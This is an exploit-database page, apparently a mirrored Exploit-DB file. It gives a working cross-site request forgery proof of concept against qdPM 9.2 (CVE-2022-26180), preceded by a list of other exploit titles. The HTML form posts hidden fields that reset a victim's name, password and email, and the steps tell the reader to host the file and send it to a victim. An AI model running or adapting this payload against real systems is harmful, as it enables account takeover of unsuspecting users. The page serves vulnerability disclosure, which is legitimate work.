50cc2edafe
9 changes to exploits/shellcodes Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path binutils 2.37 - Objdump Segmentation Fault Kramer VIAware - Remote Code Execution (RCE) (Root) Opmon 9.11 - Cross-site Scripting Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) KLiK Social Media Website 1.0 - 'Multiple' SQLi minewebcms 1.15.2 - Cross-site Scripting (XSS) qdPM 9.2 - Cross-site Request Forgery (CSRF) ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
32 lines
No EOL
1.4 KiB
Text
32 lines
No EOL
1.4 KiB
Text
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
|
|
# Google Dork: NA
|
|
# Date: 03/27/2022
|
|
# Exploit Author: Chetanya Sharma @AggressiveUser
|
|
# Vendor Homepage: https://qdpm.net/
|
|
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
|
|
# Version: 9.2
|
|
# Tested on: KALI OS
|
|
# CVE : CVE-2022-26180
|
|
#
|
|
---------------
|
|
|
|
Steps to Exploit :
|
|
1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
|
|
2) send it to victim.
|
|
|
|
<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
|
|
<input type="hidden" name="sf_method" value="put" />
|
|
<input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --->
|
|
<input type="hidden" name="users[photo_preview]" value="" />
|
|
<input type="hidden" name="users[name]" value="AggressiveUser" />
|
|
<input type="hidden" name="users[new_password]" value="TEST1122" />
|
|
<input type="hidden" name="users[email]" value="administrator@Lulz.com" />
|
|
<input type="hidden" name="users[photo]" value="" />
|
|
<input type="hidden" name="users[culture]" value="en" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |